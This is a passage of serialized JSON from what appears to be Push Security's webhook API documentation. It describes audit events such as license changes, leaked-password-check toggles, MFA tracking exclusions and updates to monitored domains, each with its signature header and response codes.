Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_687"}},"schemaId":"schema_687","pointer":"/paths/label-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"label-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_687"}},"responseCodes":["2XX"],"pointer":"label-removed","href":"audit/label-removed-event","openApiOperationId":"label-removed-event","summary":"Label removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_687","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_687"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/label-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/label-removed-event"}],"panels":[]}]},"httpPath":"label-removed"},{"label":"Leaked password check toggled","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/leaked-password-check-toggled-event","routeSlug":"/webhooks-v1/audit/leaked-password-check-toggled-event","metadata":{"seo":{"title":"Leaked password check toggled","description":"An admin user has toggled the leaked password check."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"leaked-password-check-toggled-event","name":"Leaked password check toggled","isWebhook":true,"pointer":"/paths/leaked-password-check-toggled/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Leaked password check toggled","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has toggled the leaked password check."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/leaked-password-check-toggled/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_688"}},"schemaId":"schema_688","pointer":"/paths/leaked-password-check-toggled/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"leaked-password-check-toggled","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_688"}},"responseCodes":["2XX"],"pointer":"leaked-password-check-toggled","href":"audit/leaked-password-check-toggled-event","openApiOperationId":"leaked-password-check-toggled-event","summary":"Leaked password check toggled"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_688","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_688"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/leaked-password-check-toggled/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/leaked-password-check-toggled-event"}],"panels":[]}]},"httpPath":"leaked-password-check-toggled"},{"label":"License assigned","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/license-assigned-event","routeSlug":"/webhooks-v1/audit/license-assigned-event","metadata":{"seo":{"title":"License assigned","description":"One or more employees have been assigned a license."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"license-assigned-event","name":"License assigned","isWebhook":true,"pointer":"/paths/license-assigned/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"License assigned","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"One or more employees have been assigned a license."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/license-assigned/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_689"}},"schemaId":"schema_689","pointer":"/paths/license-assigned/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"license-assigned","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_689"}},"responseCodes":["2XX"],"pointer":"license-assigned","href":"audit/license-assigned-event","openApiOperationId":"license-assigned-event","summary":"License assigned"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_689","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_689"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/license-assigned/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/license-assigned-event"}],"panels":[]}]},"httpPath":"license-assigned"},{"label":"License removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/license-removed-event","routeSlug":"/webhooks-v1/audit/license-removed-event","metadata":{"seo":{"title":"License removed","description":"The license has been removed from one or more employees."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"license-removed-event","name":"License removed","isWebhook":true,"pointer":"/paths/license-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"License removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"The license has been removed from one or more employees."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/license-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_690"}},"schemaId":"schema_690","pointer":"/paths/license-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"license-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_690"}},"responseCodes":["2XX"],"pointer":"license-removed","href":"audit/license-removed-event","openApiOperationId":"license-removed-event","summary":"License removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_690","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_690"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/license-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/license-removed-event"}],"panels":[]}]},"httpPath":"license-removed"},{"label":"Malicious browser extension detection excluded extensions added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/malicious-browser-extension-detection-excluded-extensions-added-event","routeSlug":"/webhooks-v1/audit/malicious-browser-extension-detection-excluded-extensions-added-event","metadata":{"seo":{"title":"Malicious browser extension detection excluded extensions added","description":"A set of extensions have been added to the list of excluded extensions for the malicious browser extension detection feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"malicious-browser-extension-detection-excluded-extensions-added-event","name":"Malicious browser extension detection excluded extensions added","isWebhook":true,"pointer":"/paths/malicious-browser-extension-detection-excluded-extensions-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Malicious browser extension detection excluded extensions added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of extensions have been added to the list of excluded extensions for the malicious browser extension detection feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/malicious-browser-extension-detection-excluded-extensions-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_691"}},"schemaId":"schema_691","pointer":"/paths/malicious-browser-extension-detection-excluded-extensions-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"malicious-browser-extension-detection-excluded-extensions-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_691"}},"responseCodes":["2XX"],"pointer":"malicious-browser-extension-detection-excluded-extensions-added","href":"audit/malicious-browser-extension-detection-excluded-extensions-added-event","openApiOperationId":"malicious-browser-extension-detection-excluded-extensions-added-event","summary":"Malicious browser extension detection excluded extensions added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_691","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_691"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/malicious-browser-extension-detection-excluded-extensions-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/malicious-browser-extension-detection-excluded-extensions-added-event"}],"panels":[]}]},"httpPath":"malicious-browser-extension-detection-excluded-extensions-added"},{"label":"Malicious browser extension detection excluded extensions removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/malicious-browser-extension-detection-excluded-extensions-removed-event","routeSlug":"/webhooks-v1/audit/malicious-browser-extension-detection-excluded-extensions-removed-event","metadata":{"seo":{"title":"Malicious browser extension detection excluded extensions removed","description":"A set of extensions have been removed from the list of excluded extensions for the malicious browser extension detection feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"malicious-browser-extension-detection-excluded-extensions-removed-event","name":"Malicious browser extension detection excluded extensions removed","isWebhook":true,"pointer":"/paths/malicious-browser-extension-detection-excluded-extensions-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Malicious browser extension detection excluded extensions removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of extensions have been removed from the list of excluded extensions for the malicious browser extension detection feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/malicious-browser-extension-detection-excluded-extensions-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_692"}},"schemaId":"schema_692","pointer":"/paths/malicious-browser-extension-detection-excluded-extensions-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"malicious-browser-extension-detection-excluded-extensions-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_692"}},"responseCodes":["2XX"],"pointer":"malicious-browser-extension-detection-excluded-extensions-removed","href":"audit/malicious-browser-extension-detection-excluded-extensions-removed-event","openApiOperationId":"malicious-browser-extension-detection-excluded-extensions-removed-event","summary":"Malicious browser extension detection excluded extensions removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_692","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_692"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/malicious-browser-extension-detection-excluded-extensions-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/malicious-browser-extension-detection-excluded-extensions-removed-event"}],"panels":[]}]},"httpPath":"malicious-browser-extension-detection-excluded-extensions-removed"},{"label":"Malicious copy paste detection ignored domains added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/malicious-copy-paste-detection-ignored-domains-added-event","routeSlug":"/webhooks-v1/audit/malicious-copy-paste-detection-ignored-domains-added-event","metadata":{"seo":{"title":"Malicious copy paste detection ignored domains added","description":"A set of domains have been added to the list of ignored domains for the malicious copy and paste detection feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"malicious-copy-paste-detection-ignored-domains-added-event","name":"Malicious copy paste detection ignored domains added","isWebhook":true,"pointer":"/paths/malicious-copy-paste-detection-ignored-domains-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Malicious copy paste detection ignored domains added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of domains have been added to the list of ignored domains for the malicious copy and paste detection feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/malicious-copy-paste-detection-ignored-domains-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_693"}},"schemaId":"schema_693","pointer":"/paths/malicious-copy-paste-detection-ignored-domains-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"malicious-copy-paste-detection-ignored-domains-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_693"}},"responseCodes":["2XX"],"pointer":"malicious-copy-paste-detection-ignored-domains-added","href":"audit/malicious-copy-paste-detection-ignored-domains-added-event","openApiOperationId":"malicious-copy-paste-detection-ignored-domains-added-event","summary":"Malicious copy paste detection ignored domains added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_693","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_693"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/malicious-copy-paste-detection-ignored-domains-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/malicious-copy-paste-detection-ignored-domains-added-event"}],"panels":[]}]},"httpPath":"malicious-copy-paste-detection-ignored-domains-added"},{"label":"Malicious copy paste detection ignored domains removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/malicious-copy-paste-detection-ignored-domains-removed-event","routeSlug":"/webhooks-v1/audit/malicious-copy-paste-detection-ignored-domains-removed-event","metadata":{"seo":{"title":"Malicious copy paste detection ignored domains removed","description":"A set of domains have been removed from the list of ignored domains for the malicious copy and paste detection feature."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"malicious-copy-paste-detection-ignored-domains-removed-event","name":"Malicious copy paste detection ignored domains removed","isWebhook":true,"pointer":"/paths/malicious-copy-paste-detection-ignored-domains-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Malicious copy paste detection ignored domains removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of domains have been removed from the list of ignored domains for the malicious copy and paste detection feature."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/malicious-copy-paste-detection-ignored-domains-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_694"}},"schemaId":"schema_694","pointer":"/paths/malicious-copy-paste-detection-ignored-domains-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"malicious-copy-paste-detection-ignored-domains-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_694"}},"responseCodes":["2XX"],"pointer":"malicious-copy-paste-detection-ignored-domains-removed","href":"audit/malicious-copy-paste-detection-ignored-domains-removed-event","openApiOperationId":"malicious-copy-paste-detection-ignored-domains-removed-event","summary":"Malicious copy paste detection ignored domains removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_694","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_694"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/malicious-copy-paste-detection-ignored-domains-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/malicious-copy-paste-detection-ignored-domains-removed-event"}],"panels":[]}]},"httpPath":"malicious-copy-paste-detection-ignored-domains-removed"},{"label":"MFA tracking exclusions updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/mfa-tracking-exclusions-updated","routeSlug":"/webhooks-v1/audit/mfa-tracking-exclusions-updated","metadata":{"seo":{"title":"MFA tracking exclusions updated","description":"The MFA tracking exclusions list has been updated"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"mfa-tracking-exclusions-updated","name":"MFA tracking exclusions updated","isWebhook":true,"pointer":"/paths/mfa-tracking-exclusions-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"MFA tracking exclusions updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"The MFA tracking exclusions list has been updated"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/mfa-tracking-exclusions-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_695"}},"schemaId":"schema_695","pointer":"/paths/mfa-tracking-exclusions-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"mfa-tracking-exclusions-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_695"}},"responseCodes":["2XX"],"pointer":"mfa-tracking-exclusions-updated","href":"audit/mfa-tracking-exclusions-updated","openApiOperationId":"mfa-tracking-exclusions-updated","summary":"MFA tracking exclusions updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_695","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_695"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/mfa-tracking-exclusions-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/mfa-tracking-exclusions-updated"}],"panels":[]}]},"httpPath":"mfa-tracking-exclusions-updated"},{"label":"Monitor all domains toggled","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/monitor-all-domains-toggled-event","routeSlug":"/webhooks-v1/audit/monitor-all-domains-toggled-event","metadata":{"seo":{"title":"Monitor all domains toggled","description":"An admin user has toggled the \"Monitor all domains\" setting."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"monitor-all-domains-toggled-event","name":"Monitor all domains toggled","isWebhook":true,"pointer":"/paths/monitor-all-domains-toggled/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Monitor all domains toggled","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has toggled the \"Monitor all domains\" setting."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/monitor-all-domains-toggled/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_696"}},"schemaId":"schema_696","pointer":"/paths/monitor-all-domains-toggled/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"monitor-all-domains-toggled","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_696"}},"responseCodes":["2XX"],"pointer":"monitor-all-domains-toggled","href":"audit/monitor-all-domains-toggled-event","openApiOperationId":"monitor-all-domains-toggled-event","summary":"Monitor all domains toggled"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_696","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_696"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/monitor-all-domains-toggled/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/monitor-all-domains-toggled-event"}],"panels":[]}]},"httpPath":"monitor-all-domains-toggled"},{"label":"Monitored domains added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/monitored-domains-added-event","routeSlug":"/webhooks-v1/audit/monitored-domains-added-event","metadata":{"seo":{"title":"Monitored domains added","description":"A set of domains have been added to the list of monitored company domains."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"monitored-domains-added-event","name":"Monitored domains added","isWebhook":true,"pointer":"/paths/monitored-domains-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Monitored domains added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A set of domains have been added to the list of monitored company domains."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature 